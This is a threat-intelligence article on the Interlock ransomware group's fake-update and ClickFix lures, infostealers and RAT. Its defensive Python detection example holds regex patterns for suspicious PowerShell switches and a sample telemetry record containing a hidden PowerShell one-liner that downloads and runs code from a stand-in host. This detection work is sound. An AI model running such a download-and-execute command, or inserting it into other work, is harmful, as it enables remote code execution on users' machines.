Interlock Ransomware Adapts with New Deceptive Tactics and Tools

Since its emergence in late September 2024, the ransomware group known as Interlock has steadily gained notoriety for its cunning and innovative strategies. Despite its relatively modest number of victims, Interlock has made a significant impact with its sophisticated attacks, particularly targeting sectors in North America and Europe. One of their most notable incidents involved the breach of nearly 1.5 million patients’ records at Texas Tech University Health Sciences Center. The continual evolution and refinement of their methods have allowed Interlock to remain a prominent threat in the digital landscape.

Deceptive Tactics and Social Engineering

Interlock initially relied on fake browser updates for Google Chrome and Microsoft Edge to trick victims. Beginning in January, the group expanded its repertoire to counterfeit security-software updates masquerading as legitimate products such as FortiClient, Ivanti Secure Access, and Palo Alto Networks GlobalProtect. This shift demonstrated the group’s adaptability and its commitment to refining its deceptive methods.

Interlock also adopted the ClickFix social-engineering technique, in which a fake CAPTCHA prompt instructs the victim to copy and paste a malicious PowerShell command into a Windows terminal. The technique has gained popularity since August 2024 and has also been used by other notorious threat actors, including the North Korean group Lazarus. By hosting the fake CAPTCHAs on compromised legitimate websites, Interlock led victims to install a PyInstaller file that deploys a PowerShell backdoor. Interestingly, no additional payloads were observed being delivered through this backdoor, suggesting that Interlock was experimenting with the approach without yet fully exploiting it.
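As an added detection example (not code from the original article or from any Interlock sample), the following Python scores process-creation telemetry for the ClickFix pattern described above: a script host launched from the Run box or a console whose command line carries hidden-window, download and in-memory execution switches. The event field names, the weights and threshold, and the sample records are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass, field
# ClickFix ends with the victim pasting a one-liner into the Win+R Run box or a
# console, so the script host is a child of explorer.exe/cmd.exe and its command
# line carries hidden-window, download and in-memory execution switches.
# Field names follow Sysmon Event ID 1 / Windows Security Event 4688 (assumed).
PASTE_PARENTS = {"explorer.exe", "cmd.exe", "conhost.exe", "windowsterminal.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
SUSPICIOUS = [  # (regex, weight, label); weights are illustrative assumptions
    (r"-(enc|encodedcommand|e)\b", 3, "encoded command"),
    (r"-w(indowstyle)?\s+hidden", 2, "hidden window"),
    (r"\b(iex|invoke-expression)\b", 3, "in-memory execution"),
    (r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", 3, "remote download"),
    (r"-nop\b|-noprofile\b", 1, "no profile"),
    (r"-(ep|executionpolicy)\s+bypass", 2, "execution policy bypass"),
]

@dataclass
class Verdict:
    alert: bool
    score: int
    reasons: list = field(default_factory=list)

def score_event(evt: dict, threshold: int = 5) -> Verdict:
    """Score one process-creation record; alert once the weighted score reaches threshold."""
    image = evt.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = evt.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return Verdict(False, 0)
    score, reasons = 0, []
    if parent in PASTE_PARENTS:  # launched from Run box / console rather than an application
        score, reasons = 2, [f"script host spawned by {parent}"]
    for pat, weight, label in SUSPICIOUS:
        if re.search(pat, evt.get("CommandLine", ""), re.IGNORECASE):
            score += weight
            reasons.append(label)
    return Verdict(score >= threshold, score, reasons)

def scan(records):  # (ProcessId, Verdict) for every record that crosses the threshold
    return [(r["ProcessId"], v) for r in records if (v := score_event(r)).alert]
# Constructed sample telemetry (not from a real incident); PS/EXP shorten the image paths.
PS, EXP = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe"
def ev(pid, image, parent, cmd):
    return {"ProcessId": pid, "Image": image, "ParentImage": parent, "CommandLine": cmd}
SAMPLE = [
    ev(1001, PS, EXP, 'powershell -w hidden -nop -ep bypass -c "iex (irm https://captcha.example.invalid/v)"'),
    ev(1002, PS, r"C:\Program Files\Microsoft VS Code\Code.exe", "powershell.exe -NoProfile -Command Get-Service"),
    ev(1004, PS, EXP, r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]
```

Record 1004 shows why the parent-process signal alone is not enough: an admin script launched from the Run box with an execution-policy bypass scores below the threshold, while the paste-and-run lure combines several switches and crosses it.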

Tools of the Trade

In its bid to maintain relevance and avoid the high visibility associated with more prolific ransomware groups, Interlock has developed and deployed a variety of tools such as keyloggers and infostealers. Noteworthy among these tools are BerserkStealer and LummaStealer, with LummaStealer being a prominent malware-as-a-service offering since 2022. These tools allow Interlock to gather sensitive information from victims, furthering their reach and potential impact. The group’s deliberate effort to refine their tools and tactics underscores their commitment to remaining a significant threat in the ransomware landscape.

In addition to keyloggers and infostealers, Interlock employs a custom ransomware for both Windows and Linux systems. This ransomware variant is paired with a unique remote access trojan (RAT) backdoor called Interlock RAT. This backdoor facilitates lateral movement within compromised networks. For this purpose, the group relies on the remote desktop protocol (RDP) and credentials harvested from their infostealers. Furthermore, tools like PuTTY and AnyDesk have been utilized by Interlock for remote access, providing them with the means to effectively navigate and manipulate victim systems.

Evolving Strategies and Implications for Victims

Interlock’s recent revisions to its ransom note mark a strategic shift, highlighting potential legal liabilities for companies if their stolen data is leaked. This tactic underscores the psychological pressure exerted on victims to comply with ransom demands. A notable attack earlier this month targeted the National Defense Corporation, a subsidiary of National Presto Industries. Interlock claimed to have stolen nearly 3 million files from the corporation, thereby raising concerns about the scope and severity of their attacks.

The evolving nature of Interlock’s tactics and strategies reflects a keen understanding of the cyber threat landscape. By continually refining their approaches and leveraging sophisticated social-engineering techniques, Interlock has managed to carve out a niche for themselves, positioning themselves as a resilient and adaptive threat actor. Their ability to adapt and experiment with new methods, such as the ClickFix technique, illustrates a forward-thinking mindset that keeps them one step ahead of traditional defenses.

Conclusion: Addressing the Persistent Threat

Since its appearance in late September 2024, the ransomware group Interlock has been steadily gaining a fearsome reputation due to its clever and innovative tactics. Although it has a relatively small number of victims compared to other groups, Interlock has left a significant mark through its sophisticated cyberattacks, particularly focusing on sectors in North America and Europe. One major incident that brought widespread attention to Interlock involved the breach of almost 1.5 million patient records at Texas Tech University Health Sciences Center. The group has continually adapted and refined its methods, allowing it to stay relevant and dangerous in the ever-changing digital landscape. Interlock’s ability to evolve and implement new strategies makes it a persistent threat to cybersecurity. Their operations have raised alarms, pushing organizations to improve their defenses and stay vigilant against such advanced threats. As long as Interlock continues to innovate, it remains a formidable adversary in the realm of cybersecurity.
